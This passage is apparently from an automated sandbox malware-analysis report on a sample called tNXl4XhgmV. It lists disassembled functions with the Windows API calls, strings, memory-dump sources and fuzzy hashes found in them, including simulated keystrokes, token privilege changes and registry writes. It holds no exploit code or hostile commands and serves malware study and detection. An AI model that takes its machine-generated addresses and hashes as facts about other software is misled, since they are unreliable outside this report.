GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001A07B0

Part of subcall function 00187BCC: _memmove.LIBCMT ref: 00187C06

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 7250b4e9e09e1709473a4c0292f4eb2bd235f50bffa779566e9f88679cd78450
Instruction ID: ea64ce9831b8efb31c648b993902d4e6d7d461e9a1dea3f3258fd012a75044bd
Opcode Fuzzy Hash: 7250b4e9e09e1709473a4c0292f4eb2bd235f50bffa779566e9f88679cd78450
Instruction Fuzzy Hash: C9E0CD369442285BC730E6589C05FEA77DDDFC87A0F0541B5FC0CD7249DA609D8086D0

Function 001E8E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 001E8EC1

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: 9d2e678c81746cded91479feb4db519dc7f18eea65df48fa66e09507cd85556e
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: 9AE092B0504B405BD7388E24D800BA373E1AB06304F00081DF6AA83241EB6278418759

Function 01160DE8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 01160DF3

Memory Dump Source

Source File: 00000001.00000002.1290068241.0000000001160000.00000040.00000020.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1160000_tNXl4XhgmV.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: d45a21d27e7fe22d3238e8b1cee865cbaecbedbb8c3d26f20648d58d533ec91f
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 75E08C7090522CEBDB18CAB88D08AE973ACAB09321F004699B906C3280D6328E30D661

Function 01160DB8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 01160DC3

Memory Dump Source

Source File: 00000001.00000002.1290068241.0000000001160000.00000040.00000020.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1160000_tNXl4XhgmV.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 3be98412ee57c86f0f1301757700289d604abf6357880581e69ddc51f38e2761
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 11D0A73190520CEBCB14CFB89D049DE73ACDB09321F104754FD15D32C0D632A9109750

Function 001A525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 001A5266

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: d7b59fbcc42e400a25d4ed2a4263c47fcf8717883f6e7f789a5f8185d8397c5b
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: CFB0927A44420CB7CF012A82EC02B893B1A9B52764F408021FB0C18162A773A6649A89

Function 011627C4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 011627D9

Memory Dump Source

Source File: 00000001.00000002.1290068241.0000000001160000.00000040.00000020.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1160000_tNXl4XhgmV.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: ab800cf991e64baebd873b1bc4fcc32d00758ababcbe126fa07ed19b95d0ed07
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 7EE0BF7494410EEFDB04DFA8D649ADD7BB4EF04301F1005A1FD05D7680DB319E649A62

Function 011627C8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 011627D9

Memory Dump Source

Source File: 00000001.00000002.1290068241.0000000001160000.00000040.00000020.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1160000_tNXl4XhgmV.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 486ec06207283654e17d134bc340a1ef2c6eb52b4b36a26aa29ae7ce4fd7f190
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: BCE0E67494410EDFDB00DFB8D649A9D7BB4EF04301F100161FD01D2280DB319D609A62

Non-executed Functions

Function 0020CABC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 632windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0020CB37
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0020CB95
GetWindowLongW.USER32(?,000000F0), ref: 0020CBD6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0020CC00
SendMessageW.USER32 ref: 0020CC29
_wcsncpy.LIBCMT ref: 0020CC95
GetKeyState.USER32(00000011), ref: 0020CCB6
GetKeyState.USER32(00000009), ref: 0020CCC3
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0020CCD9
GetKeyState.USER32(00000010), ref: 0020CCE3
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0020CD0C
SendMessageW.USER32 ref: 0020CD33
SendMessageW.USER32(?,00001030,?,0020B348), ref: 0020CE37
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0020CE4D
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0020CE60
SetCapture.USER32(?), ref: 0020CE69
ClientToScreen.USER32(?,?), ref: 0020CECE
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0020CEDB
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0020CEF5
ReleaseCapture.USER32 ref: 0020CF00
GetCursorPos.USER32(?), ref: 0020CF3A
ScreenToClient.USER32(?,?), ref: 0020CF47
SendMessageW.USER32(?,00001012,00000000,?), ref: 0020CFA3
SendMessageW.USER32 ref: 0020CFD1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0020D00E
SendMessageW.USER32 ref: 0020D03D
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0020D05E
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0020D06D
GetCursorPos.USER32(?), ref: 0020D08D
ScreenToClient.USER32(?,?), ref: 0020D09A
GetParent.USER32(?), ref: 0020D0BA
SendMessageW.USER32(?,00001012,00000000,?), ref: 0020D123
SendMessageW.USER32 ref: 0020D154
ClientToScreen.USER32(?,?), ref: 0020D1B2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0020D1E2
SendMessageW.USER32(?,00001111,00000000,?), ref: 0020D20C
SendMessageW.USER32 ref: 0020D22F
ClientToScreen.USER32(?,?), ref: 0020D281
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0020D2B5

Part of subcall function 001825DB: GetWindowLongW.USER32(?,000000EB), ref: 001825EC

GetWindowLongW.USER32(?,000000F0), ref: 0020D351

Strings

@GUI_DRAGID, xrefs: 0020CE9C
pb$, xrefs: 0020CEAF
F, xrefs: 0020D235

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pb$
API String ID: 3977979337-1047011096
Opcode ID: 5993eb204601ff576014884787c27fa2d8d6d0e7fa73fe4a4c9fd48540eb2626
Instruction ID: 94f9aa29e1bd175d2ec19cb4cab0b427c2fad40da3a93b9b3d7524edfb4bc613
Opcode Fuzzy Hash: 5993eb204601ff576014884787c27fa2d8d6d0e7fa73fe4a4c9fd48540eb2626
Instruction Fuzzy Hash: 8242CDB4214342AFD720CF28D888AAABBE5FF49314F240629F595872F2C771D861DF52

Function 00196F9E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 001971C3
_memset.LIBCMT ref: 00197539
_memmove.LIBCMT ref: 001976AC

Strings

P\#, xrefs: 001D1AB8
[:>:]], xrefs: 00197492
]#, xrefs: 001D1A22
DEFINE, xrefs: 001D2103
[:<:]], xrefs: 00197479
Q\E, xrefs: 00197FCB
\b(?=\w), xrefs: 001D3769
\b(?<=\w), xrefs: 001D3773

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: _memmove$_memset
String ID: ]#$DEFINE$P\#$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-2031552863
Opcode ID: d0055cd27bd8d8b1a96144597982be05a508204e10525ce02baa890a8ef8b7a1
Instruction ID: 5bba20f6525a40212d2f5adeac3bb9d4a70ac42c2ca566cf4e4b8325bfca31fc
Opcode Fuzzy Hash: d0055cd27bd8d8b1a96144597982be05a508204e10525ce02baa890a8ef8b7a1
Instruction Fuzzy Hash: 36939E75E04219DBDF28CF98C881BADB7B1FF58710F25816AE955AB381E7709E81CB40

Function 001848D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 001848DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001BD665
IsIconic.USER32(?), ref: 001BD66E
ShowWindow.USER32(?,00000009), ref: 001BD67B
SetForegroundWindow.USER32(?), ref: 001BD685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001BD69B
GetCurrentThreadId.KERNEL32 ref: 001BD6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 001BD6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 001BD6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 001BD6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 001BD6CF
SetForegroundWindow.USER32(?), ref: 001BD6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 001BD6E7
keybd_event.USER32(00000012,00000000), ref: 001BD6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 001BD6FC
keybd_event.USER32(00000012,00000000), ref: 001BD701
MapVirtualKeyW.USER32(00000012,00000000), ref: 001BD70A
keybd_event.USER32(00000012,00000000), ref: 001BD70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 001BD719
keybd_event.USER32(00000012,00000000), ref: 001BD71E
SetForegroundWindow.USER32(?), ref: 001BD721
AttachThreadInput.USER32(?,?,00000000), ref: 001BD748

Strings

Shell_TrayWnd, xrefs: 001BD660

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 76a84e51fbb533aff5a4028ae144d754c07371d89260641a41c1b2e4a6ee3990
Instruction ID: 1f441c7bc5e03f4b1713a4b8db702e282a96c139fa85b6cf2f2bdfefb8284d96
Opcode Fuzzy Hash: 76a84e51fbb533aff5a4028ae144d754c07371d89260641a41c1b2e4a6ee3990
Instruction Fuzzy Hash: 32317571A803187BEB346B61AD89FBF7F6CEB44B50F114025FA04EA1D1DBB15D01ABA1

Function 001D8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 001D87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001D882B
Part of subcall function 001D87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001D8858
Part of subcall function 001D87E1: GetLastError.KERNEL32 ref: 001D8865

_memset.LIBCMT ref: 001D8353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 001D83A5
CloseHandle.KERNEL32(?), ref: 001D83B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001D83CD
GetProcessWindowStation.USER32 ref: 001D83E6
SetProcessWindowStation.USER32(00000000), ref: 001D83F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 001D840A

Part of subcall function 001D81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001D8309), ref: 001D81E0
Part of subcall function 001D81CB: CloseHandle.KERNEL32(?,?,001D8309), ref: 001D81F2

Strings

default, xrefs: 001D8405
, xrefs: 001D8362
winsta0, xrefs: 001D83C8

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: c0d9365686c1408c91eb3f199c1cdf803a364ac0fa6bae40f5d352f1c00abbd0
Instruction ID: 40e1f068c0368d65f52ade818b8bbcfb8ca1a51609dfd30d7403c81ed8f72442
Opcode Fuzzy Hash: c0d9365686c1408c91eb3f199c1cdf803a364ac0fa6bae40f5d352f1c00abbd0
Instruction Fuzzy Hash: BB8160B1900209BFDF11DFA8ED49AEEBBB9FF04304F14416AF914A6261DB319E55DB20

Function 001EC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 001EC78D
FindClose.KERNEL32(00000000), ref: 001EC7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001EC806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001EC81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 001EC844
__swprintf.LIBCMT ref: 001EC890
__swprintf.LIBCMT ref: 001EC8D3

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

__swprintf.LIBCMT ref: 001EC927

Part of subcall function 001A3698: __woutput_l.LIBCMT ref: 001A36F1

__swprintf.LIBCMT ref: 001EC975

Part of subcall function 001A3698: __flsbuf.LIBCMT ref: 001A3713
Part of subcall function 001A3698: __flsbuf.LIBCMT ref: 001A372B

__swprintf.LIBCMT ref: 001EC9C4
__swprintf.LIBCMT ref: 001ECA13
__swprintf.LIBCMT ref: 001ECA62

Strings

%4d, xrefs: 001EC8CD
%02d, xrefs: 001EC91B, 001EC925, 001EC973, 001EC9C2, 001ECA11, 001ECA60
%4d%02d%02d%02d%02d%02d, xrefs: 001EC88A

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 2866d63737ee7751dd5d84142da2749ac7154ccd562bed60e5aa4e5f1863c840
Instruction ID: 47b609cc88c53ad37f65d82a381f8d233dfd0b5da65dd0b50028193fa95743a3
Opcode Fuzzy Hash: 2866d63737ee7751dd5d84142da2749ac7154ccd562bed60e5aa4e5f1863c840
Instruction Fuzzy Hash: 06A119B2408345ABC754FBA4C986DBFB7ECEFA5704F440929F59586191EB30DA08CB62

Function 001EEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 001EEFB6
_wcscmp.LIBCMT ref: 001EEFCB
_wcscmp.LIBCMT ref: 001EEFE2
GetFileAttributesW.KERNEL32(?), ref: 001EEFF4
SetFileAttributesW.KERNEL32(?,?), ref: 001EF00E
FindNextFileW.KERNEL32(00000000,?), ref: 001EF026
FindClose.KERNEL32(00000000), ref: 001EF031
FindFirstFileW.KERNEL32(*.*,?), ref: 001EF04D
_wcscmp.LIBCMT ref: 001EF074
_wcscmp.LIBCMT ref: 001EF08B
SetCurrentDirectoryW.KERNEL32(?), ref: 001EF09D
SetCurrentDirectoryW.KERNEL32(00238920), ref: 001EF0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 001EF0C5
FindClose.KERNEL32(00000000), ref: 001EF0D2
FindClose.KERNEL32(00000000), ref: 001EF0E4

Strings

*.*, xrefs: 001EF048

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 8ced704519a168bf6e277f681190fb516211c4d130ed86e3a2f3c782901ba3ed
Instruction ID: 263489faadef887351dac04b43af4b9eb835f6d23fc8027274e4dc7dfeb80e8a
Opcode Fuzzy Hash: 8ced704519a168bf6e277f681190fb516211c4d130ed86e3a2f3c782901ba3ed
Instruction Fuzzy Hash: A931C3326416586FDB24EFA5EC48BEE77AD9F49360F1001B9FC04D2192DB70DA45CA61

Function 00200857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00200953
RegCreateKeyExW.ADVAPI32(?,?,00000000,0020F910,00000000,?,00000000,?,?), ref: 002009C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00200A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00200A92
RegCloseKey.ADVAPI32(?), ref: 00200DB2
RegCloseKey.ADVAPI32(00000000), ref: 00200DBF

Strings

REG_EXPAND_SZ, xrefs: 00200A2F
REG_DWORD, xrefs: 00200C83
REG_BINARY, xrefs: 00200D4D
REG_MULTI_SZ, xrefs: 00200B7A
REG_SZ, xrefs: 00200AD0
REG_QWORD, xrefs: 00200D00

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 4bcbb2938763a7f7a8db470a9967ad8aa507bdeebee2c2ac43e8e952e94de4d4
Instruction ID: 127d2084e86f5c2f71792670a8e1b238de223b90dcb930cf24919b19f3303e71
Opcode Fuzzy Hash: 4bcbb2938763a7f7a8db470a9967ad8aa507bdeebee2c2ac43e8e952e94de4d4
Instruction Fuzzy Hash: 41024A756106029FDB54EF14C885E2AB7E5FF9A714F04845DF88A9B3A2CB30ED51CB81

Function 001EF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 001EF113
_wcscmp.LIBCMT ref: 001EF128
_wcscmp.LIBCMT ref: 001EF13F

Part of subcall function 001E4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 001E43A0

FindNextFileW.KERNEL32(00000000,?), ref: 001EF16E
FindClose.KERNEL32(00000000), ref: 001EF179
FindFirstFileW.KERNEL32(*.*,?), ref: 001EF195
_wcscmp.LIBCMT ref: 001EF1BC
_wcscmp.LIBCMT ref: 001EF1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 001EF1E5
SetCurrentDirectoryW.KERNEL32(00238920), ref: 001EF203
FindNextFileW.KERNEL32(00000000,00000010), ref: 001EF20D
FindClose.KERNEL32(00000000), ref: 001EF21A
FindClose.KERNEL32(00000000), ref: 001EF22C

Strings

*.*, xrefs: 001EF190

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: fb4cb0df8480eb22c9b579f7b49ce4c3179d80ced413c50e7fdd31cefdc1fa7c
Instruction ID: 315b17f12a43c5d798f853a2e440b5b7fcaa055ac220dd2e1eb51c8f8544a4d5
Opcode Fuzzy Hash: fb4cb0df8480eb22c9b579f7b49ce4c3179d80ced413c50e7fdd31cefdc1fa7c
Instruction Fuzzy Hash: 5331073A54065E6ADB20AB75EC48BEE77AC9F46360F100179FD14E2191DB30DE46CA54

Function 001966E1 Relevance: 23.4, Strings: 18, Instructions: 889COMMON

Download Yara Rule

Strings

pG", xrefs: 00196751
0E", xrefs: 0019673D
LF), xrefs: 001D12A4
CR), xrefs: 001D1287
ANYCRLF), xrefs: 001D12FB
UTF16), xrefs: 001D10CF
ANY), xrefs: 001D12DE
UTF), xrefs: 001D10FA
NO_AUTO_POSSESS), xrefs: 001D112E
0F", xrefs: 00196747
LIMIT_RECURSION=, xrefs: 001D11FC
UCP), xrefs: 001D110D
LIMIT_MATCH=, xrefs: 001D1170
0D", xrefs: 00196733
CRLF), xrefs: 001D12C1
BSR_ANYCRLF), xrefs: 001D131E
BSR_UNICODE), xrefs: 001D1338
NO_START_OPT), xrefs: 001D114F

Memory Dump Source

